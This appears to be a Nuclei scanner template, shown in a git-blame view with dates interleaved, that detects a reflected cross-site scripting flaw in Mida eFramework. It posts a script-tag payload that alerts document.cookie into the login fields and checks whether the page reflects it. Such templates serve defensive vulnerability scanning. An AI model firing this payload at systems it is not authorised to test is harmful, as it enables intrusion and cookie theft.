2020-09-15 19:25:55 +00:00
|
|
|
id: mida-eframework-xss
|
2020-09-08 09:45:12 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Mida eFramework - Cross Site Scripting
|
|
|
|
author: pikpikcu
|
|
|
|
severity: medium
|
2021-02-12 05:53:01 +00:00
|
|
|
tags: mida,xss
|
2020-09-08 09:45:12 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /MUP/ HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
Referer: {{Hostname}}/MUP
|
|
|
|
|
|
|
|
UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2021-09-08 12:17:19 +00:00
|
|
|
|
2020-09-08 09:45:12 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
2021-02-12 05:53:01 +00:00
|
|
|
- '"><script>javascript:alert(document.cookie)</script>'
|